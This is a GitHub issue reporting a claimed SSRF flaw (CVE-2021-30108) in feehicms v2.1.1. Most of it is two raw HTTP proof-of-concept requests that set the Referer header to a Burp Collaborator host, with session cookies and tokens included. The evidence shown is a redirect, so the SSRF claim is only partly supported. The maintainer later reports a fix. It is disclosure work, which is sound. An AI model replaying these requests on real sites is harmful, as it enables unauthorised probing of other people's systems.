cms
cms copied to clipboard
Published
20 hours ago •
liufee
liufee
SSRF vulnerability in feehicms v2.1.1
This is a Server-side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows:
We need to send two requests
1. First register an account normally, here my account is test123, and the password is 123456
2. Log out of our account and log in again from the picture below
use burpsuite change the http Referer Header,
The first POC request is as follows
GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
3. Login with our account and password
use burpsuite , We don't modify anything
The second POC request is as follows
POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1
_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=
Then we found that the response packet of the second request contained a 302 jump, The jump url is the Referrer header of our first request packet
The response of the second request packet is as follows
4. Vulnerability proof
5. how to fix
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Hi, This issue was assigned with CVE-2021-30108. Was it ever addressed / fixed?
Hi, This issue was assigned with CVE-2021-30108. Was it ever addressed / fixed?
It hasn't been fixed yet
@Jason1314Zhang https://github.com/liufee/cms/commit/d45cb9cb26d6f5ef491fa2c7d87ac7f26091bd7c Hi, thanks for your feedback. The secruity problem has been fixed.
